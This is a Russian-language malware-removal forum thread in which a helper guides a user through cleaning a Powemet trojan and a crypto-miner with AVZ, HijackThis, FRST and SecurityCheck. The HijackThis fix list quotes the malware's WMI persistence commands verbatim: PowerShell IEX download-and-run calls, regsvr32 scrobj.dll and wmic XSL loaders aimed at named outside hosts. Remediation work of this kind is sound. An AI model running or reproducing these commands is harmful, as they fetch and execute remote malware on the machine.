Подцепил Trojan:Win32/Powemet.A!attk
Были ещё вредоносы, но они удалились с помощью Trojan Remover.
А этот не хочет, что с ним делать?
Подцепил Trojan:Win32/Powemet.A!attk
Были ещё вредоносы, но они удалились с помощью Trojan Remover.
А этот не хочет, что с ним делать?
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Dzarabr, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Здравствуйте!
Видны следы нескольких вредоносов. Будем чистить последовательно.
Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV-br.exe (или любое другое имя).
В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.
После перезагрузки системы соберите новый CollectionLog Автологером.
Сделал!!
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
Хорошо, продолжаем.
Временно отключите защитное ПО.
Выполните скрипт в AVZ:
Компьютер перезагрузится.Код:begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('c:\windows\Adobeupdate.exe', ''); QuarantineFile('c:\windows\help\AdobeFlac.exe', ''); DeleteSchedulerTask('AdobeUpdateFlac'); DeleteSchedulerTask('AdobeUpdateFlac2'); DeleteFile('c:\windows\Adobeupdate.exe', '64'); DeleteFile('c:\windows\help\AdobeFlac.exe', '64'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end.
"Пофиксите" в HijackThis:
Код:O1 - Hosts: Reset contents to default O22 - Tasks: Trojan Remover - C:\Program Files\Loaris Trojan Remover\ltr.exe O25 - WMI Event: bacru4 - bacru3 - Event="__InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.oopmus.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://bec.rocop.ru:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oopmus.ru:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oopmus.ru:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi22.oopmus.xyz:8080/power.txt')||regsvr32 /u /s /i:http://oopmus.xyz:8080/s22.txt scrobj.dll&wmic os get /FORMAT:\"http://wmi2.oopmus.xyz:8220/s2.xsl" O25 - WMI Event: tosa4 - tosa3 - Event="__InstanceModificationEvent WITHIN 10500 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.webpublicservices.org:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://webpublicservices.org:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://webpublicservices.org:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi22.ha7455h6fi1.net:8080/power.txt')||regsvr32 /u /s /i:http://ha7455h6fi1.net:8080/s22.txt scrobj.dll&wmic os get /FORMAT:\"http://wmi2.ha7455h6fi1.net:8220/s2.xsl"
Перезагрузите компьютер.
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.
Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Сделал!
Да, троян-майнер был, я думал он полностью удалился...
Кстати, ещё вопрос, у меня почему-то прекратили работать плагины VPN для браузера Google Chrome. Это может быть связано со зловредами? Или просто совпало?
Последний раз редактировалось Dzarabr; 30.09.2022 в 07:57.
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
Скачайте вложенный архив, извлеките из него reg-файл и запустите. Согласитесь с внесением изменений в реестр.
Перезагрузите компьютер, удалите старые и соберите новые логи FRST.txt и Addition.txt
Готово!!
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
Скорее всего просто совпало.Сообщение от Dzarabr
Я пробовал поправить не запущенную службу теневого копирования и не получилось.
Впрочем, это выходит за рамки тематики данного форума.
Если основная проблема решена, в завершение:
1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.
Остальные утилиты лечения и папки можно просто удалить.
2.
- Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
- Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
- Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
- Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
- Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
- Прикрепите этот файл к своему следующему сообщению.
Готово, всё сделал!
Получается, всё, больше никаких вирусов нет?
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
------------------------------- [ Windows ] -------------------------------
Контроль учётных записей пользователя включен
Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
-------------------------- [ SecurityUtilities ] --------------------------
KeePass Password Safe 2.51.1 v.2.51.1 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
NVIDIA GeForce Experience 3.20.5.70 v.3.20.5.70 Внимание! Скачать обновления
Foxit Reader v.10.1.1.37576 Внимание! Скачать обновления
^Локализованные версии могут обновляться позже англоязычных!^
------------------------------ [ ArchAndFM ] ------------------------------
7-Zip 19.00 (x64) v.19.00 Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
--------------------------------- [ P2P ] ---------------------------------
qBittorrent 4.3.4.1 v.4.3.4.1 Внимание! Скачать обновления
------------------------------- [ Browser ] -------------------------------
Google Chrome v.105.0.5195.127 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О браузере Google Chrome!^
----------------------------- [ EmailClient ] -----------------------------
Mozilla Thunderbird (x86 ru) v.91.11.0 Внимание! Скачать обновления
---------------------------- [ UnwantedApps ] -----------------------------
Loaris Trojan Remover 3.1.60 v.3.1.60 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Будьте осторожны при установке всяких "репаков", скачанных с торрента. Лучше подобное вообще не устанавливать.
Читайте Советы и рекомендации после лечения компьютера.
Да, спасибо большое!
Буду разбираться дальше
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
Проделайте такую же процедуру с этим вложенным файлом.
Loaris Trojan Remover не удаляется. Деинсталлятор не находит её. Возможно, он частично удалён и там какие-то остатки присутствуют?
Может быть его поставить заново и потом удалить?
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
Пробуйте удалить принудительно через Geek Uninstaller
reg-файл получилось запустить, изменения есть?
Да, reg-файл запустил, отчёты прикрепил.
Geek Uninstaller пишет вот такую штуку:
Невозможно открыть файл С:\Program Files\Loaris Trojan Remover\uninst000.dat. Деинсталляция невозможна
Ошибка 5: Отказано в доступе.
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
Вы пробовали правой кнопкой - Принудительное удаление?
Нет, не догадался.
Сейчас сделал, всё получилось!
Спасибо!
Позволь, я отрублю ему голову! (с) "Золотая антилопа"
Ваши права в разделе
Ответить с цитированием
